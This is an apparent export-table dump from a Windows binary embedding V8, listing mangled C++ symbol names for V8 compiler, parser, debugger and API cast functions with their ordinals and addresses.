                                                                                                                                                                                                                                    ?Cast@SymbolObject@v8@@SAPEAV12@PEAVValue@2@@Z40310x1400972c0
                                                                                                                                                                                                                                    ?Cast@TypedArray@v8@@SAPEAV12@PEAVValue@2@@Z40320x1400972c0
                                                                                                                                                                                                                                    ?Cast@Uint16Array@v8@@SAPEAV12@PEAVValue@2@@Z40330x1400972c0
                                                                                                                                                                                                                                    ?Cast@Uint32@v8@@SAPEAV12@PEAVData@2@@Z40340x1400972c0
                                                                                                                                                                                                                                    ?Cast@Uint32Array@v8@@SAPEAV12@PEAVValue@2@@Z40350x1400972c0
                                                                                                                                                                                                                                    ?Cast@Uint8Array@v8@@SAPEAV12@PEAVValue@2@@Z40360x1400972c0
                                                                                                                                                                                                                                    ?Cast@Uint8ClampedArray@v8@@SAPEAV12@PEAVValue@2@@Z40370x1400972c0
                                                                                                                                                                                                                                    ?Cast@WasmMemoryObject@v8@@SAPEAV12@PEAVValue@2@@Z40380x1400972c0
                                                                                                                                                                                                                                    ?Cast@WasmModuleObject@v8@@SAPEAV12@PEAVValue@2@@Z40390x1400972c0
                                                                                                                                                                                                                                    ?Cast@WasmValueObject@debug@v8@@SAPEAV123@PEAVValue@3@@Z40400x1400972c0
                                                                                                                                                                                                                                    ?Catch@Promise@v8@@QEAA?AV?$MaybeLocal@VPromise@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VFunction@v8@@@2@@Z40410x140c79a60
                                                                                                                                                                                                                                    ?CellAlignIndex@Bitmap@internal@v8@@SAII@Z40420x14053e410
                                                                                                                                                                                                                                    ?CellAt@GlobalDictionary@internal@v8@@QEAA?AVPropertyCell@23@VInternalIndex@23@@Z40430x14053e420
                                                                                                                                                                                                                                    ?CellAt@GlobalDictionary@internal@v8@@QEAA?AVPropertyCell@23@VPtrComprCageBase@23@VInternalIndex@23@@Z40440x14053e440
                                                                                                                                                                                                                                    ?CellsCount@Bitmap@internal@v8@@SA_KXZ40450x14053e460
                                                                                                                                                                                                                                    ?CellsForLength@Bitmap@internal@v8@@SA_KH@Z40460x14053e470
                                                                                                                                                                                                                                    ?Change@CommonOperatorReducer@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@00@Z40470x141127510
                                                                                                                                                                                                                                    ?Change@CommonOperatorReducer@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@0@Z40480x141127630
                                                                                                                                                                                                                                    ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@AEBVCallable@34@HW4FrameStateFlag@1234@@Z40490x14119b100
                                                                                                                                                                                                                                    ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@0000@Z40500x14119b1c0
                                                                                                                                                                                                                                    ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@000@Z40510x14119b3c0
                                                                                                                                                                                                                                    ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@00@Z40520x14119b560
                                                                                                                                                                                                                                    ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@@Z40530x14119b6a0
                                                                                                                                                                                                                                    ?Change@SimplifiedOperatorReducer@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@0@Z40540x1411fb8a0
                                                                                                                                                                                                                                    ?ChangeBitToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40550x1410d4f40
                                                                                                                                                                                                                                    ?ChangeBreakOnException@Debug@internal@v8@@QEAAXW4ExceptionBreakType@23@_N@Z40560x140bb7ce0
                                                                                                                                                                                                                                    ?ChangeFloat32ToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$TNode@UFloat32T@internal@v8@@@34@@Z40570x1410a82f0
                                                                                                                                                                                                                                    ?ChangeFloat32ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40580x1410e1cf0
                                                                                                                                                                                                                                    ?ChangeFloat32ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40590x141051730
                                                                                                                                                                                                                                    ?ChangeFloat32ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40600x1410a8350
                                                                                                                                                                                                                                    ?ChangeFloat64ToInt32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40610x1410e1d50
                                                                                                                                                                                                                                    ?ChangeFloat64ToInt32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40620x141051740
                                                                                                                                                                                                                                    ?ChangeFloat64ToInt32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40630x1410a8390
                                                                                                                                                                                                                                    ?ChangeFloat64ToInt64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40640x1410e1db0
                                                                                                                                                                                                                                    ?ChangeFloat64ToInt64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40650x141051750
                                                                                                                                                                                                                                    ?ChangeFloat64ToInt64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40660x1410a83d0
                                                                                                                                                                                                                                    ?ChangeFloat64ToIntPtr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z40670x1410a8410
                                                                                                                                                                                                                                    ?ChangeFloat64ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@@Z40680x1410d4f50
                                                                                                                                                                                                                                    ?ChangeFloat64ToTaggedPointer@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40690x1410d4f90
                                                                                                                                                                                                                                    ?ChangeFloat64ToUint32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint32T@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z40700x1410a8480
                                                                                                                                                                                                                                    ?ChangeFloat64ToUint32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40710x1410e1e10
                                                                                                                                                                                                                                    ?ChangeFloat64ToUint32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40720x141051760
                                                                                                                                                                                                                                    ?ChangeFloat64ToUint32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40730x1410a84e0
                                                                                                                                                                                                                                    ?ChangeFloat64ToUint64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint64T@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z40740x1410a8520
                                                                                                                                                                                                                                    ?ChangeFloat64ToUint64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40750x141051770
                                                                                                                                                                                                                                    ?ChangeFloat64ToUint64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40760x1410a8580
                                                                                                                                                                                                                                    ?ChangeFloat64ToUintPtr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUintPtrT@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z40770x1410a85c0
                                                                                                                                                                                                                                    ?ChangeInt31ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40780x1410d4fa0
                                                                                                                                                                                                                                    ?ChangeInt32ToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$TNode@UInt32T@internal@v8@@@34@@Z40790x1410a8630
                                                                                                                                                                                                                                    ?ChangeInt32ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40800x1410e1e70
                                                                                                                                                                                                                                    ?ChangeInt32ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40810x141051780
                                                                                                                                                                                                                                    ?ChangeInt32ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40820x1410a8690
                                                                                                                                                                                                                                    ?ChangeInt32ToInt64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt64T@internal@v8@@@34@V?$TNode@UInt32T@internal@v8@@@34@@Z40830x1410a86d0
                                                                                                                                                                                                                                    ?ChangeInt32ToInt64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40840x1410e1ed0
                                                                                                                                                                                                                                    ?ChangeInt32ToInt64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40850x141051790
                                                                                                                                                                                                                                    ?ChangeInt32ToInt64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40860x1410a8730
                                                                                                                                                                                                                                    ?ChangeInt32ToIntPtr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z40870x1410a8770
                                                                                                                                                                                                                                    ?ChangeInt32ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40880x1410d4fb0
                                                                                                                                                                                                                                    ?ChangeInt64ToBigInt@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40890x1410d4fc0
                                                                                                                                                                                                                                    ?ChangeInt64ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40900x1410e1f30
                                                                                                                                                                                                                                    ?ChangeInt64ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40910x1410517a0
                                                                                                                                                                                                                                    ?ChangeInt64ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40920x1410a87f0
                                                                                                                                                                                                                                    ?ChangeInt64ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40930x1410d4fd0
                                                                                                                                                                                                                                    ?ChangeOp@NodeProperties@compiler@internal@v8@@SAXPEAVNode@234@PEBVOperator@234@@Z40940x140098020
                                                                                                                                                                                                                                    ?ChangeOp@SimplifiedLowering@compiler@internal@v8@@AEAAXPEAVNode@234@PEBVOperator@234@@Z40950x1411f3a80
                                                                                                                                                                                                                                    ?ChangeTaggedSignedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40960x1410d4fe0
                                                                                                                                                                                                                                    ?ChangeTaggedSignedToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40970x1410d4ff0
                                                                                                                                                                                                                                    ?ChangeTaggedToBit@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40980x1410d5000
                                                                                                                                                                                                                                    ?ChangeTaggedToFloat64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40990x1410d5010
                                                                                                                                                                                                                                    ?ChangeTaggedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41000x1410d5020
                                                                                                                                                                                                                                    ?ChangeTaggedToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41010x1410d5030
                                                                                                                                                                                                                                    ?ChangeTaggedToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41020x1410d5040
                                                                                                                                                                                                                                    ?ChangeTaggedToUint32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41030x1410d5050
                                                                                                                                                                                                                                    ?ChangeUint32ToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z41040x1410a8830
                                                                                                                                                                                                                                    ?ChangeUint32ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z41050x1410e1f90
                                                                                                                                                                                                                                    ?ChangeUint32ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41060x1410517b0
                                                                                                                                                                                                                                    ?ChangeUint32ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z41070x1410a8890
                                                                                                                                                                                                                                    ?ChangeUint32ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41080x1410d5060
                                                                                                                                                                                                                                    ?ChangeUint32ToUint64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint64T@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z41090x1410a88d0
                                                                                                                                                                                                                                    ?ChangeUint32ToUint64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z41100x1410e1ff0
                                                                                                                                                                                                                                    ?ChangeUint32ToUint64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41110x1410517c0
                                                                                                                                                                                                                                    ?ChangeUint32ToUint64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z41120x1410a8930
                                                                                                                                                                                                                                    ?ChangeUint32ToWord@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUintPtrT@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z41130x1410a8970
                                                                                                                                                                                                                                    ?ChangeUint64ToBigInt@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41140x1410d5070
                                                                                                                                                                                                                                    ?ChangeUint64ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41150x1410d5080
                                                                                                                                                                                                                                    ?ChangeUintPtrToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@@Z41160x1410a89f0
                                                                                                                                                                                                                                    ?ChangeUsed@NormalPageMemoryRegion@internal@cppgc@@AEAAX_K_N@Z41170x1405045f0
                                                                                                                                                                                                                                    ?Changed@Reducer@compiler@internal@v8@@SA?AVReduction@234@PEAVNode@234@@Z41180x140097ad0
                                                                                                                                                                                                                                    ?Check@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NW4Value@Token@23@@Z41190x14088d5e0
                                                                                                                                                                                                                                    ?Check@TurboAssembler@internal@v8@@QEAAXW4Condition@23@W4AbortReason@23@@Z41200x1405f5400
                                                                                                                                                                                                                                    ?CheckApiConstants@HeapObjectHeader@internal@cppgc@@AEAAXXZ41210x1400971a0
                                                                                                                                                                                                                                    ?CheckApiInterrupt@StackGuard@internal@v8@@QEAA_NXZ41220x14053e480
                                                                                                                                                                                                                                    ?CheckArityRestrictions@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXHW4FunctionKind@23@_NHH@Z41230x14088d610
                                                                                                                                                                                                                                    ?CheckArrayLength@JSCallReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4ElementsKind@34@IAEBUFeedbackSource@234@VEffect@234@VControl@234@@Z41240x141160c40
                                                                                                                                                                                                                                    ?CheckAssigningFunctionLiteralToProperty@Parser@internal@v8@@CAXPEAVExpression@23@0@Z41250x14088d6e0
                                                                                                                                                                                                                                    ?CheckAtStart@RegExpBytecodeGenerator@internal@v8@@UEAAXHPEAVLabel@23@@Z41260x140853d50
                                                                                                                                                                                                                                    ?CheckAtStart@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z41270x14056e320
                                                                                                                                                                                                                                    ?CheckBigInt@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z41280x141249b40
                                                                                                                                                                                                                                    ?CheckBigInt@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41290x1410d5090
                                                                                                                                                                                                                                    ?CheckBitInTable@RegExpBytecodeGenerator@internal@v8@@UEAAXV?$Handle@VByteArray@internal@v8@@@23@PEAVLabel@23@@Z41300x140853e20
                                                                                                                                                                                                                                    ?CheckBitInTable@RegExpMacroAssemblerX64@internal@v8@@UEAAXV?$Handle@VByteArray@internal@v8@@@23@PEAVLabel@23@@Z41310x14056e430
                                                                                                                                                                                                                                    ?CheckBounds@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@0@Z41320x141249b50
                                                                                                                                                                                                                                    ?CheckBounds@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@V?$Flags@W4CheckBoundsFlag@compiler@internal@v8@@H@base@4@@Z41330x1410d5170
                                                                                                                                                                                                                                    ?CheckBreakPoint@Debug@internal@v8@@AEAA_NV?$Handle@VBreakPoint@internal@v8@@@23@_N@Z41340x140bb7cf0
                                                                                                                                                                                                                                    ?CheckBreakPoints@Debug@internal@v8@@AEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@V?$Handle@VDebugInfo@internal@v8@@@23@PEAVBreakLocation@23@PEA_N@Z41350x140bb7e60
                                                                                                                                                                                                                                    ?CheckBreakPointsForLocations@Debug@internal@v8@@AEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@V?$Handle@VDebugInfo@internal@v8@@@23@AEAV?$vector@VBreakLocation@internal@v8@@V?$allocator@VBreakLocation@internal@v8@@@std@@@std@@PEA_N@Z41360x140bb7ee0
                                                                                                                                                                                                                                    ?CheckCachedDataInvariants@ExternalOneByteStringResource@String@v8@@AEBAXXZ41370x1400971a0
                                                                                                                                                                                                                                    ?CheckCachedDataInvariants@ExternalStringResource@String@v8@@AEBAXXZ41380x1400971a0
                                                                                                                                                                                                                                    ?CheckCallable@Parser@internal@v8@@AEAAPEAVStatement@23@PEAVVariable@23@PEAVExpression@23@H@Z41390x1408ba6f0
                                                                                                                                                                                                                                    ?CheckCast@AccessorPair@debug@v8@@CAXPEAVValue@3@@Z41400x140bc8ae0
                                                                                                                                                                                                                                    ?CheckCast@AccessorSignature@v8@@CAXPEAVData@2@@Z41410x140c79e00
                                                                                                                                                                                                                                    ?CheckCast@Array@v8@@CAXPEAVValue@2@@Z41420x140c79e90
                                                                                                                                                                                                                                    ?CheckCast@ArrayBuffer@v8@@CAXPEAVValue@2@@Z41430x140c79f20
                                                                                                                                                                                                                                    ?CheckCast@ArrayBufferView@v8@@CAXPEAVValue@2@@Z41440x140c79fb0
                                                                                                                                                                                                                                    ?CheckCast@BigInt64Array@v8@@CAXPEAVValue@2@@Z41450x140c7a040
                                                                                                                                                                                                                                    ?CheckCast@BigInt@v8@@CAXPEAVData@2@@Z41460x140c7a0e0
                                                                                                                                                                                                                                    ?CheckCast@BigIntObject@v8@@CAXPEAVValue@2@@Z41470x140c7a170
                                                                                                                                                                                                                                    ?CheckCast@BigUint64Array@v8@@CAXPEAVValue@2@@Z41480x140c7a210
                                                                                                                                                                                                                                    ?CheckCast@Boolean@v8@@CAXPEAVData@2@@Z41490x140c7a2b0
                                                                                                                                                                                                                                    ?CheckCast@BooleanObject@v8@@CAXPEAVValue@2@@Z41500x140c7a340
                                                                                                                                                                                                                                    ?CheckCast@Context@v8@@CAXPEAVData@2@@Z41510x140c7a3f0
                                                                                                                                                                                                                                    ?CheckCast@DataView@v8@@CAXPEAVValue@2@@Z41520x140c7a480
                                                                                                                                                                                                                                    ?CheckCast@Date@v8@@CAXPEAVValue@2@@Z41530x140c7a510
                                                                                                                                                                                                                                    ?CheckCast@External@v8@@CAXPEAVValue@2@@Z41540x140c7a5a0
                                                                                                                                                                                                                                    ?CheckCast@FixedArray@v8@@CAXPEAVData@2@@Z41550x140c7a630
                                                                                                                                                                                                                                    ?CheckCast@Float32Array@v8@@CAXPEAVValue@2@@Z41560x140c7a6c0
                                                                                                                                                                                                                                    ?CheckCast@Float64Array@v8@@CAXPEAVValue@2@@Z41570x140c7a760
                                                                                                                                                                                                                                    ?CheckCast@Function@v8@@CAXPEAVValue@2@@Z41580x140c7a800
                                                                                                                                                                                                                                    ?CheckCast@FunctionTemplate@v8@@CAXPEAVData@2@@Z41590x140c7a880
                                                                                                                                                                                                                                    ?CheckCast@Int16Array@v8@@CAXPEAVValue@2@@Z41600x140c7a910
                                                                                                                                                                                                                                    ?CheckCast@Int32@v8@@CAXPEAVData@2@@Z41610x140c7a9b0
                                                                                                                                                                                                                                    ?CheckCast@Int32Array@v8@@CAXPEAVValue@2@@Z41620x140c7aa30
                                                                                                                                                                                                                                    ?CheckCast@Int8Array@v8@@CAXPEAVValue@2@@Z41630x140c7aad0
                                                                                                                                                                                                                                    ?CheckCast@Integer@v8@@CAXPEAVData@2@@Z41640x140c7ab70
                                                                                                                                                                                                                                    ?CheckCast@Map@v8@@CAXPEAVValue@2@@Z41650x140c7ac00
                                                                                                                                                                                                                                    ?CheckCast@Module@v8@@CAXPEAVData@2@@Z41660x140c7ac90
                                                                                                                                                                                                                                    ?CheckCast@ModuleRequest@v8@@CAXPEAVData@2@@Z41670x140c7ad20
                                                                                                                                                                                                                                    ?CheckCast@Name@v8@@CAXPEAVData@2@@Z41680x140c7adb0
                                                                                                                                                                                                                                    ?CheckCast@Number@v8@@CAXPEAVData@2@@Z41690x140c7ae40
                                                                                                                                                                                                                                    ?CheckCast@NumberObject@v8@@CAXPEAVValue@2@@Z41700x140c7aed0
                                                                                                                                                                                                                                    ?CheckCast@Object@v8@@CAXPEAVValue@2@@Z41710x140c7af80
                                                                                                                                                                                                                                    ?CheckCast@ObjectTemplate@v8@@CAXPEAVData@2@@Z41720x140c7b010
                                                                                                                                                                                                                                    ?CheckCast@PrimitiveArray@v8@@CAXPEAVData@2@@Z41730x140c7b0a0
                                                                                                                                                                                                                                    ?CheckCast@Private@v8@@CAXPEAVData@2@@Z41740x140c7b130
                                                                                                                                                                                                                                    ?CheckCast@Promise@v8@@CAXPEAVValue@2@@Z41750x140c7b1c0
                                                                                                                                                                                                                                    ?CheckCast@Proxy@v8@@CAXPEAVValue@2@@Z41760x140c7b250
                                                                                                                                                                                                                                    ?CheckCast@RegExp@v8@@CAXPEAVValue@2@@Z41770x140c7b2e0
                                                                                                                                                                                                                                    ?CheckCast@Resolver@Promise@v8@@CAXPEAVValue@3@@Z41780x140c7b370
                                                                                                                                                                                                                                    ?CheckCast@Set@v8@@CAXPEAVValue@2@@Z41790x140c7b400
                                                                                                                                                                                                                                    ?CheckCast@SharedArrayBuffer@v8@@CAXPEAVValue@2@@Z41800x140c7b490
                                                                                                                                                                                                                                    ?CheckCast@Signature@v8@@CAXPEAVData@2@@Z41810x140c7b520
                                                                                                                                                                                                                                    ?CheckCast@String@v8@@CAXPEAVData@2@@Z41820x140c7b5b0
                                                                                                                                                                                                                                    ?CheckCast@StringObject@v8@@CAXPEAVValue@2@@Z41830x140c7b630
                                                                                                                                                                                                                                    ?CheckCast@Symbol@v8@@CAXPEAVData@2@@Z41840x140c7b6d0
                                                                                                                                                                                                                                    ?CheckCast@SymbolObject@v8@@CAXPEAVValue@2@@Z41850x140c7b760
                                                                                                                                                                                                                                    ?CheckCast@TypedArray@v8@@CAXPEAVValue@2@@Z41860x140c7b800
                                                                                                                                                                                                                                    ?CheckCast@Uint16Array@v8@@CAXPEAVValue@2@@Z41870x140c7b890
                                                                                                                                                                                                                                    ?CheckCast@Uint32@v8@@CAXPEAVData@2@@Z41880x140c7b930
                                                                                                                                                                                                                                    ?CheckCast@Uint32Array@v8@@CAXPEAVValue@2@@Z41890x140c7b9b0
                                                                                                                                                                                                                                    ?CheckCast@Uint8Array@v8@@CAXPEAVValue@2@@Z41900x140c7ba50
                                                                                                                                                                                                                                    ?CheckCast@Uint8ClampedArray@v8@@CAXPEAVValue@2@@Z41910x140c7baf0
                                                                                                                                                                                                                                    ?CheckCast@Value@v8@@CAXPEAVData@2@@Z41920x140c7bb90
                                                                                                                                                                                                                                    ?CheckCast@WasmMemoryObject@v8@@CAXPEAVValue@2@@Z41930x140c7bc50
                                                                                                                                                                                                                                    ?CheckCast@WasmModuleObject@v8@@CAXPEAVValue@2@@Z41940x140c7bce0
                                                                                                                                                                                                                                    ?CheckCast@WasmValueObject@debug@v8@@CAXPEAVValue@3@@Z41950x140bc8b10
                                                                                                                                                                                                                                    ?CheckCharacter@RegExpBytecodeGenerator@internal@v8@@UEAAXIPEAVLabel@23@@Z41960x140853fa0
                                                                                                                                                                                                                                    ?CheckCharacter@RegExpMacroAssemblerX64@internal@v8@@UEAAXIPEAVLabel@23@@Z41970x14056e530
                                                                                                                                                                                                                                    ?CheckCharacterAfterAnd@RegExpBytecodeGenerator@internal@v8@@UEAAXIIPEAVLabel@23@@Z41980x1408540d0
                                                                                                                                                                                                                                    ?CheckCharacterAfterAnd@RegExpMacroAssemblerX64@internal@v8@@UEAAXIIPEAVLabel@23@@Z41990x14056e5a0
                                                                                                                                                                                                                                    ?CheckCharacterGT@RegExpBytecodeGenerator@internal@v8@@UEAAXGPEAVLabel@23@@Z42000x140854220
                                                                                                                                                                                                                                    ?CheckCharacterGT@RegExpMacroAssemblerX64@internal@v8@@UEAAXGPEAVLabel@23@@Z42010x14056e670
                                                                                                                                                                                                                                    ?CheckCharacterInRange@RegExpBytecodeGenerator@internal@v8@@UEAAXGGPEAVLabel@23@@Z42020x140854300
                                                                                                                                                                                                                                    ?CheckCharacterInRange@RegExpMacroAssemblerX64@internal@v8@@UEAAXGGPEAVLabel@23@@Z42030x14056e6e0
                                                                                                                                                                                                                                    ?CheckCharacterInRangeArray@RegExpBytecodeGenerator@internal@v8@@UEAA_NPEBV?$ZoneList@VCharacterRange@internal@v8@@@23@PEAVLabel@23@@Z42040x140098380
                                                                                                                                                                                                                                    ?CheckCharacterInRangeArray@RegExpMacroAssemblerX64@internal@v8@@UEAA_NPEBV?$ZoneList@VCharacterRange@internal@v8@@@23@PEAVLabel@23@@Z42050x14056e7f0
                                                                                                                                                                                                                                    ?CheckCharacterLT@RegExpBytecodeGenerator@internal@v8@@UEAAXGPEAVLabel@23@@Z42060x140854430
                                                                                                                                                                                                                                    ?CheckCharacterLT@RegExpMacroAssemblerX64@internal@v8@@UEAAXGPEAVLabel@23@@Z42070x14056e860
                                                                                                                                                                                                                                    ?CheckCharacterNotInRange@RegExpBytecodeGenerator@internal@v8@@UEAAXGGPEAVLabel@23@@Z42080x140854510
                                                                                                                                                                                                                                    ?CheckCharacterNotInRange@RegExpMacroAssemblerX64@internal@v8@@UEAAXGGPEAVLabel@23@@Z42090x14056e8d0
                                                                                                                                                                                                                                    ?CheckCharacterNotInRangeArray@RegExpBytecodeGenerator@internal@v8@@UEAA_NPEBV?$ZoneList@VCharacterRange@internal@v8@@@23@PEAVLabel@23@@Z42100x140098380
                                                                                                                                                                                                                                    ?CheckCharacterNotInRangeArray@RegExpMacroAssemblerX64@internal@v8@@UEAA_NPEBV?$ZoneList@VCharacterRange@internal@v8@@@23@PEAVLabel@23@@Z42110x14056e9e0
                                                                                                                                                                                                                                    ?CheckClassFieldName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@_N@Z42120x14088d700
                                                                                                                                                                                                                                    ?CheckClassMethodName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@W4ParsePropertyKind@23@V?$Flags@W4ParseFunctionFlag@internal@v8@@H@base@3@_NPEA_N@Z42130x14088d750
                                                                                                                                                                                                                                    ?CheckClosure@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VFeedbackCell@internal@v8@@@34@@Z42140x1410d5300
                                                                                                                                                                                                                                    ?CheckConflictingVarDeclarations@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEAVDeclarationScope@23@@Z42150x14088d7e0
                                                                                                                                                                                                                                    ?CheckConflictingVarDeclarations@DeclarationScope@internal@v8@@QEAAPEAVDeclaration@23@PEA_N@Z42160x140c63860
                                                                                                                                                                                                                                    ?CheckContextualKeyword@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEBVAstRawString@23@@Z42170x14088d860
                                                                                                                                                                                                                                    ?CheckDeoptMarkedAllocationSites@StackGuard@internal@v8@@QEAA_NXZ42180x14053e490
                                                                                                                                                                                                                                    ?CheckDetachedContextsAfterGC@Isolate@internal@v8@@QEAAXXZ42190x140b65fd0
                                                                                                                                                                                                                                    ?CheckEqualsInternalizedString@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42200x1410d53c0
                                                                                                                                                                                                                                    ?CheckEqualsSymbol@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42210x1410d53d0
                                                                                                                                                                                                                                    ?CheckExecutionState@Debug@internal@v8@@QEAA_NXZ42220x1405342d0
                                                                                                                                                                                                                                    ?CheckFlagsForFunctionFromScript@ParseInfo@internal@v8@@QEAAXVScript@23@@Z42230x1400971a0
                                                                                                                                                                                                                                    ?CheckFlagsForToplevelCompileFromScript@ParseInfo@internal@v8@@AEAAXVScript@23@_N@Z42240x1408c8a10
                                                                                                                                                                                                                                    ?CheckFloat64Hole@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z42250x141249c50
